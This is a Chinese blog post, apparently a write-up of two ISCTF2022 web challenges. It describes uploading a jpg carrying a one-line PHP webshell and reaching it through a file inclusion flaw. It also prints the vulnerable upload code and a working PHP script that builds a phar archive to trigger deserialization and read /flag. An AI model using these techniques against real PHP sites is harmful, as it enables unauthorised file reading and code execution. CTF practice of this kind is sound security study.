ISCTF2022补充

Sn_u

已于 2022-11-08 14:49:13 修改

阅读量333

点赞数

文章标签： php 开发语言

于 2022-11-08 14:47:22 首次发布

本文链接：https://blog.csdn.net/starttv/article/details/127750559

版权

文章目录

ISCTF补充
- easy_upload
- upload

ISCTF补充

easy_upload

请添加图片描述

用dirsearch工具扫描目录发现www.rar

在这里插入图片描述

源码

<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
if (preg_match("/flag|\.\.|\/\//i", $file)) {
echo "no hack";
 exit();
} 
include $file;
}else{
    include("upload.php");
}
?>

尝试上传文件发现除了jpg图片，别的都不让上传。

分析源码发现存在文件包含。

上传一个带有一句话木马的jpg图片，再利用文件包含。

upload

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Gn1Jbzjj-1667889751766)(/Users/sun/Library/Application Support/typora-user-images/image-20221108143649804.png)]

源码index.php

 <?php
      include("class.php");
      if(isset($_GET['img_name'])){
         $down = new check_img();
         echo $down->img_check();
       }
       if(isset($_FILES["file"]["name"])){
          $up = new upload();
          echo $up->start();
        }
    ?>

class.php

<?php
class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = $_FILES["file"]["name"];
        $this->ext = end(explode(".", $_FILES["file"]["name"]));
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }

    public function start(){
        return $this->check();
    }

    private function check(){
        if(file_exists($this->filename)){
            return "Image already exsists";
        }elseif(!in_array($this->ext, $this->Valid_ext)){
            return "Only Image Can Be Uploaded";
        }else{
            return $this->move();
        }
    }

    private function move(){
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
        return "Upload succsess!";
    }

    public function __wakeup(){
        echo file_get_contents($this->filename);
    }
}


class check_img{
    public $img_name;
    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    public function img_check(){
        if(file_exists($this->img_name)){
            return "Image exsists";
        }else{
            return "Image not exsists";
        }
    }
}

分析代码发现存在file_exit()函数并且可以上传文件，想到phar反序列化。

Payload：

<?php

class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = $_FILES["file"]["name"];
        $this->ext = end(explode(".", $_FILES["file"]["name"]));
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }
    public function __wakeup(){
        echo file_get_contents($this->filename);
    }
}
$a=new upload();
$a->filename="/flag";
$phartest=new phar('phartest.phar',0);//后缀名必须为phar
$phartest->startBuffering();//开始缓冲 Phar 写操作
$phartest->setMetadata($a);//自定义的meta-data存入manifest
$phartest->setStub('<?php __HALT_COMPILER();?>');//设置stub，stub是一个简单的php文件。PHP通过stub识别一个文件为PHAR文件，可以利用这点绕过文件上传检测
$phartest->addFromString("test.txt","test");//添加要压缩的文件
$phartest->stopBuffering();//停止缓冲对 Phar 归档的写入请求，并将更改保存到磁盘

Sn_u

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
ISCTF2022补充

分析代码发现存在file_exit()函数并且可以上传文件，想到phar反序列化。上传一个带有一句话木马的jpg图片，再利用文件包含。用dirsearch工具扫描目录发现www.rar。尝试上传文件发现出了jpg图片，别的都不让上传。分析源码发现存在文件包含。源码index.php。
复制链接

扫一扫